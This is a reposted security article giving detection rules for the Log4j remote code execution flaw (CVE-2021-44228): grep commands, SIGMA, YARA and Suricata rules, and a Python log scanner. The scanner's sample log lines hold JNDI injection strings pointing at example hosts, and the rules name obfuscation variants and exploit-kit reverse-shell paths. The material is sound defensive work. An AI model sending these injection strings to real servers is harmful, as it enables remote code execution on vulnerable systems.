Log4j Remote Code Execution Vulnerability (CVE-2021-44228): Exploitation Detection Rules

Posted by admin on 2021-12-11 18:05:01 in Security Articles



National Internet Emergency Center (CNCERT):

    On December 10, 2021, the China National Vulnerability Database (CNVD) recorded the Apache Log4j2 remote code execution vulnerability (CNVD-2021-95914). An attacker exploiting this vulnerability can execute code remotely without authorization. Exploit details are now public, and Apache has released a patch that fixes the vulnerability. CNVD advises affected users to update to the latest version immediately and to take preventive measures against exploitation.



Contents:

(1) Host-log-based detection

1. Grep/Zgrep

2. Grep/Zgrep (exploitation variant detection)

3. SIGMA rules

4. YARA rules


(2) Network-traffic-based NIDS detection (Snort/Suricata rules) and Zeek detection script


(3) Other information

- Attack payloads

- C2 domains

- Attacker IPs

- Hashes of affected Log4j versions



(1) Host-log-based detection:


1. Grep/Zgrep

Search plain-text logs under /var/log for a JNDI lookup string (-i also catches mixed-case variants; $ and { are escaped so egrep treats them literally):

# sudo egrep -i -r '\$\{jndi:(ldaps?|rmi|dns):/[^\n]+' /var/log


Same search over rotated, gzip-compressed logs (the glob is quoted so find, not the shell, expands it):

# sudo find /var/log -name '*.gz' -print0 | xargs -0 zgrep -E -i '\$\{jndi:(ldaps?|rmi|dns):/[^\n]+'


2. Grep/Zgrep (exploitation variant detection)

The sed and tr steps strip the ${lower:...} wrapper and every closing brace, so an obfuscated lookup such as ${${lower:j}ndi:...} collapses back to a plain jndi: string before egrep sees it. The $ in the sed expression is escaped because the command runs inside double quotes; the -exec terminator must be written \; so the outer shell does not consume it.

# sudo find /var/log/ -type f -exec sh -c "cat {} | sed -e 's/\${lower://'g | tr -d '}' | egrep -i 'jndi:(ldaps?|rmi|dns):'" \;


# sudo find /var/log/ -name "*.gz" -type f -exec sh -c "zcat {} | sed -e 's/\${lower://'g | tr -d '}' | egrep -i 'jndi:(ldaps?|rmi|dns):'" \;


3. SIGMA rules

1) web_cve_2021_44228_log4j.yml

title: Log4j RCE CVE-2021-44228 Generic
id: 5ea8faa8-db8b-45be-89b0-151b84c82702
status: experimental
description: Detects exploitation attempt against log4j RCE vulnerability reported as CVE-2021-44228
author: Florian Roth
date: 2021/12/10
references:
    - https://www.lunasec.io/docs/blog/log4j-zero-day/
    - https://news.ycombinator.com/item?id=29504755
    - https://github.com/tangxiaofeng7/apache-log4j-poc
    - https://gist.github.com/Neo23x0/e4c8b03ff8cdf1fa63b7d15db6e3860b
    - https://github.com/YfryTchsGD/Log4jAttackSurface
    - https://twitter.com/shutingrz/status/1469255861394866177?s=21
tags:
    - attack.initial_access
    - attack.t1190
logsource:
    category: webserver
detection:
    keywords:
        - '${jndi:ldap:/'
        - '${jndi:rmi:/'
        - '${jndi:ldaps:/'
        - '${jndi:dns:/'
    condition: keywords
falsepositives:
    - Vulnerability scanning
level: high


2) web_cve_2021_44228_log4j_fields.yml

title: Log4j RCE CVE-2021-44228 in Fields
id: 9be472ed-893c-4ec0-94da-312d2765f654
status: experimental
description: Detects exploitation attempt against log4j RCE vulnerability reported as CVE-2021-44228 in different header fields found in web server logs
author: Florian Roth
date: 2021/12/10
references:
    - https://www.lunasec.io/docs/blog/log4j-zero-day/
    - https://news.ycombinator.com/item?id=29504755
    - https://github.com/tangxiaofeng7/apache-log4j-poc
    - https://gist.github.com/Neo23x0/e4c8b03ff8cdf1fa63b7d15db6e3860b
    - https://github.com/YfryTchsGD/Log4jAttackSurface
    - https://twitter.com/shutingrz/status/1469255861394866177?s=21
tags:
    - attack.initial_access
    - attack.t1190
logsource:
    category: webserver
detection:
    selection:
        cs-User-Agent|contains:
            - '${jndi:ldap:/'
            - '${jndi:rmi:/'
            - '${jndi:ldaps:/'
            - '${jndi:dns:/'
        user-agent|contains:
            - '${jndi:ldap:/'
            - '${jndi:rmi:/'
            - '${jndi:ldaps:/'
            - '${jndi:dns:/'
        cs-uri|contains:
            - '${jndi:ldap:/'
            - '${jndi:rmi:/'
            - '${jndi:ldaps:/'
            - '${jndi:dns:/'
        cs-referrer|contains:
            - '${jndi:ldap:/'
            - '${jndi:rmi:/'
            - '${jndi:ldaps:/'
            - '${jndi:dns:/'
    condition: selection
falsepositives:
    - Vulnerability scanning
level: high


4. YARA rules


rule EXPL_Log4j_CVE_2021_44228_Dec21_Soft {
   meta:
      description = "Detects indicators in server logs that indicate an exploitation attempt of CVE-2021-44228"
      author = "Florian Roth"
      reference = "https://twitter.com/h113sdx/status/1469010902183661568?s=20"
      date = "2021-12-10"
      score = 70
   strings:
      $x1 = "${jndi:ldap:/"
      $x2 = "${jndi:rmi:/"
      $x3 = "${jndi:ldaps:/"
      $x4 = "${jndi:dns:/"
   condition:
      1 of them
}


rule EXPL_Log4j_CVE_2021_44228_Dec21_Hard {
   meta:
      description = "Detects indicators in server logs that indicate the exploitation of CVE-2021-44228"
      author = "Florian Roth"
      reference = "https://twitter.com/h113sdx/status/1469010902183661568?s=20"
      date = "2021-12-10"
      score = 80
   strings:
      /* full lookup with host, port and path; $, {, }, / and . are escaped as YARA regex syntax requires */
      $x1 = /\$\{jndi:(ldap|ldaps|rmi|dns):\/[\/]?[a-z-\.0-9]{3,120}:[0-9]{2,5}\/[a-zA-Z\.]{1,32}\}/
      /* lookups pointing at loopback or private ranges are treated as false positives */
      $fp1r = /(ldap|rmi|ldaps|dns):\/[\/]?(127\.0\.0\.1|192\.168\.|172\.[1-3][0-9]\.|10\.)/
   condition:
      $x1 and not 1 of ($fp*)
}


rule SUSP_Base64_Encoded_Exploit_Indicators_Dec21 {
   meta:
      description = "Detects base64 encoded strings found in payloads of exploits against log4j CVE-2021-44228"
      author = "Florian Roth"
      reference = "https://twitter.com/Reelix/status/1469327487243071493"
      date = "2021-12-10"
      score = 70
   strings:
      /* curl -s  */
      $sa1 = "Y3VybCAtcy"
      $sa2 = "N1cmwgLXMg"
      $sa3 = "jdXJsIC1zI"
      /* |wget -q -O-  */
      $sb1 = "fHdnZXQgLXEgLU8tI"
      $sb2 = "x3Z2V0IC1xIC1PLS"
      $sb3 = "8d2dldCAtcSAtTy0g"
   condition:
      1 of ($sa*) and 1 of ($sb*)
}


rule SUSP_JDNIExploit_Indicators_Dec21 {
   meta:
      description = "Detects indicators of JDNI usage in log files and other payloads"
      author = "Florian Roth"
      reference = "https://github.com/flypig5211/JNDIExploit"
      date = "2021-12-10"
      score = 70
   strings:
      /* slashes inside a YARA regex must be escaped; unescaped ones end the pattern early */
      $xr1 = /ldap:\/\/[a-zA-Z0-9\.]{7,80}:[0-9]{2,5}\/(Basic\/Command\/Base64|Basic\/ReverseShell|Basic\/TomcatMemshell|Basic\/JBossMemshell|Basic\/WebsphereMemshell|Basic\/SpringMemshell|Basic\/Command|Deserialization\/CommonsCollectionsK|Deserialization\/CommonsBeanutils|Deserialization\/Jre8u20\/TomcatMemshell|Deserialization\/CVE_2020_2555\/WeblogicMemshell|TomcatBypass|GroovyBypass|WebsphereBypass)\//
   condition:
      filesize < 100MB and $xr1
}


rule SUSP_EXPL_OBFUSC_Dec21_1 {
   meta:
      description = "Detects obfuscation methods used to evade detection in log4j exploitation attempt of CVE-2021-44228"
      author = "Florian Roth"
      reference = "https://twitter.com/testanull/status/1469549425521348609"
      date = "2021-12-11"
      score = 60
   strings:
      /* ${lower:X} - single character match */
      $ = { 24 7B 6C 6F 77 65 72 3A ?? 7D }
      /* ${upper:X} - single character match */
      $ = { 24 7B 75 70 70 65 72 3A ?? 7D }
      /* URL encoded lower - obfuscation in URL */
      $ = "$%7blower:"
      $ = "$%7bupper:"
      $ = "%24%7bjndi:"
      $ = "/$%7bjndi:"
   condition:
      1 of them
}
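As an added example (my own code, not from the original post or from the rule author), the following Python scanner combines the idea of the grep variant in section 2 with the SUSP_EXPL_OBFUSC_Dec21_1 and EXPL_Log4j_CVE_2021_44228_Dec21_Hard YARA rules: it URL-decodes each log line, strips ${lower:}/${upper:} wrappers, matches the normalized jndi lookup, and labels hits that point at loopback or RFC 1918 addresses as likely false positives. The sample log lines are constructed; the regexes and verdict labels are mine and only approximate the rules' patterns.

```python
import re
from urllib.parse import unquote

# Constructed sample web-server log lines (not taken from the original post).
SAMPLE_LINES = [
    '203.0.113.10 - - [10/Dec/2021:12:00:01 +0000] "GET / HTTP/1.1" 200 12 "-" "${jndi:ldap://203.0.113.10:1389/a}"',
    '203.0.113.10 - - [10/Dec/2021:12:00:02 +0000] "GET /?q=${${lower:j}ndi:${upper:l}dap://203.0.113.10:1389/a} HTTP/1.1" 404 0',
    '203.0.113.10 - - [10/Dec/2021:12:00:03 +0000] "GET /login HTTP/1.1" 200 512 "-" "%24%7Bjndi:rmi://203.0.113.10:1099/x%7D"',
    '10.0.0.7 - - [10/Dec/2021:12:00:04 +0000] "GET /health HTTP/1.1" 200 2 "-" "${jndi:ldap://192.168.1.20:389/cn=app}"',
    '10.0.0.7 - - [10/Dec/2021:12:00:05 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
]

# ${lower:X} / ${upper:X} wrappers: the obfuscation the sed/tr pipeline strips and
# that SUSP_EXPL_OBFUSC_Dec21_1 flags. Any argument length is accepted here.
CASE_LOOKUP = re.compile(r'\$\{(lower|upper):([^{}]*)\}', re.IGNORECASE)
# Normalized jndi lookup; scheme and host are captured for triage.
JNDI = re.compile(r'\$\{jndi:(ldaps?|rmi|dns):/+([a-z0-9.\-]+)(?::\d{2,5})?', re.IGNORECASE)
# Loopback/private hosts, the same idea as the $fp1r exclusion in the "Hard" rule
# (RFC 1918 bounds written out exactly instead of the rule's 172.[1-3][0-9]. shortcut).
PRIVATE = re.compile(r'^(127\.0\.0\.1|10\.|192\.168\.|172\.(1[6-9]|2\d|3[01])\.)')

def normalize(line, rounds=3):
    """Undo URL encoding and ${lower:}/${upper:} wrapping so the jndi pattern is visible."""
    for _ in range(rounds):
        decoded = unquote(line)
        # Replace each wrapper by its argument; case does not matter for the jndi match.
        decoded = CASE_LOOKUP.sub(lambda m: m.group(2), decoded)
        if decoded == line:
            break
        line = decoded
    return line

def scan(lines):
    """Return (line_number, scheme, host, verdict) for every line carrying a jndi lookup."""
    hits = []
    for n, raw in enumerate(lines, 1):
        m = JNDI.search(normalize(raw))
        if not m:
            continue
        scheme, host = m.group(1).lower(), m.group(2).lower()
        verdict = "internal-likely-fp" if PRIVATE.match(host) else "exploit-attempt"
        hits.append((n, scheme, host, verdict))
    return hits

if __name__ == "__main__":
    for hit in scan(SAMPLE_LINES):
        print(hit)
```

Normalization stops after three rounds, so deeper nesting or further encodings are still better caught by the broader hex patterns in the YARA rule above.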


(2) Network-traffic-based NIDS detection (Snort/Suricata rules) and Zeek detection script


SIDs 2034647-2034658


alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt (http ldap) (CVE-2021-44228)"; flow:established,to_server; content:"|24 7b|jndi|3a|ldap|3a 2f 2f|"; nocase; fast_pattern; reference:url,lunasec.io/docs/blog/log4j-zero-day/; reference:cve,2021-44228; classtype:attempted-admin; sid:2034647; rev:1; metadata:attack_target Server, created_at 2021_12_10, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_10;)


alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt (http rmi) (CVE-2021-44228)"; flow:established,to_server; content:"|24 7b|jndi|3a|rmi|3a 2f 2f|"; nocase; fast_pattern; reference:url,lunasec.io/docs/blog/log4j-zero-day/; reference:cve,2021-44228; classtype:attempted-admin; sid:2034648; rev:1; metadata:attack_target Server, created_at 2021_12_10, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_10;)


alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt (tcp ldap) (CVE-2021-44228)"; flow:established,to_server; content:"|24 7b|jndi|3a|ldap|3a 2f 2f|"; nocase; fast_pattern; reference:url,lunasec.io/docs/blog/log4j-zero-day/; reference:cve,2021-44228; classtype:attempted-admin; sid:2034649; rev:1; metadata:attack_target Server, created_at 2021_12_10, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_10;)


alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt (tcp rmi) (CVE-2021-44228)"; flow:established,to_server; content:"|24 7b|jndi|3a|rmi|3a 2f 2f|"; nocase; fast_pattern; reference:url,lunasec.io/docs/blog/log4j-zero-day/; reference:cve,2021-44228; classtype:attempted-admin; sid:2034650; rev:1; metadata:attack_target Server, created_at 2021_12_10, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_10;)


alert udp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt (udp rmi) (CVE-2021-44228)"; content:"|24 7b|jndi|3a|rmi|3a 2f 2f|"; nocase; fast_pattern; reference:url,lunasec.io/docs/blog/log4j-zero-day/; reference:cve,2021-44228; classtype:attempted-admin; sid:2034652; rev:2; metadata:attack_target Server, created_at 2021_12_10, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_10;)


alert udp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt (udp ldap) (CVE-2021-44228)"; content:"|24 7b|jndi|3a|ldap|3a 2f 2f|"; nocase; fast_pattern; reference:url,lunasec.io/docs/blog/log4j-zero-day/; reference:cve,2021-44228; classtype:attempted-admin; sid:2034651; rev:2; metadata:attack_target Server, created_at 2021_12_10, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_10;)


alert udp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt (udp dns) (CVE-2021-44228)"; content:"|24 7b|jndi|3a|dns|3a 2f 2f|"; nocase; fast_pattern; reference:url,lunasec.io/docs/blog/log4j-zero-day/; reference:cve,2021-44228; classtype:attempted-admin; sid:2034653; rev:2; metadata:attack_target Server, created_at 2021_12_10, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_10;)


alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt (tcp dns) (CVE-2021-44228)"; flow:established,to_server; content:"|24 7b|jndi|3a|dns|3a 2f 2f|"; nocase; fast_pattern; reference:url,lunasec.io/docs/blog/log4j-zero-day/; reference:cve,2021-44228; classtype:attempted-admin; sid:2034654; rev:2; metadata:attack_target Server, created_at 2021_12_10, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_10;)


alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt (http dns) (CVE-2021-44228)"; flow:established,to_server; content:"|24 7b|jndi|3a|dns|3a 2f 2f|"; nocase; fast_pattern; reference:url,lunasec.io/docs/blog/log4j-zero-day/; reference:cve,2021-44228; classtype:attempted-admin; sid:2034655; rev:2; metadata:attack_target Server, created_at 2021_12_10, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_10;)


alert udp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt (udp ldaps) (CVE-2021-44228)"; content:"|24 7b|jndi|3a|ldaps|3a 2f 2f|"; nocase; fast_pattern; reference:url,lunasec.io/docs/blog/log4j-zero-day/; reference:cve,2021-44228; classtype:attempted-admin; sid:2034656; rev:2; metadata:attack_target Server, created_at 2021_12_10, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_10;)


alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt (tcp ldaps) (CVE-2021-44228)"; flow:established,to_server; content:"|24 7b|jndi|3a|ldaps|3a 2f 2f|"; nocase; fast_pattern; reference:url,lunasec.io/docs/blog/log4j-zero-day/; reference:cve,2021-44228; classtype:attempted-admin; sid:2034657; rev:2; metadata:attack_target Server, created_at 2021_12_10, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_10;)


alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt (http ldaps) (CVE-2021-44228)"; flow:established,to_server; content:"|24 7b|jndi|3a|ldaps|3a 2f 2f|"; nocase; fast_pattern; reference:url,lunasec.io/docs/blog/log4j-zero-day/; reference:cve,2021-44228; classtype:attempted-admin; sid:2034658; rev:2; metadata:attack_target Server, created_at 2021_12_10, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_10;)


Zeek detection script

https://github.com/nturley3/zeek-http-rce


Other information:

Attack payloads

https://gist.github.com/nathanqthai/01808c569903f41a52e7e7b575caa890


C2 domains

https://gist.github.com/superducktoes/9b742f7b44c71b4a0d19790228ce85d8


Attacker IPs

https://gist.github.com/gnremy/c546c7911d5f876f263309d7161a7217


Hashes of affected Log4j versions

https://github.com/mubix/CVE-2021-44228-Log4Shell-Hashes


References:

RCE 0-day exploit found in log4j, a popular Java logging package from netsec



Originally published on the WeChat public account 天御攻防实验室: Log4j Remote Code Execution Vulnerability (CVE-2021-44228): Exploitation Detection Rules

Reprinted on CN-SEC中文网 (keep this link when reposting): https://cn-sec.com/archives/671474.html
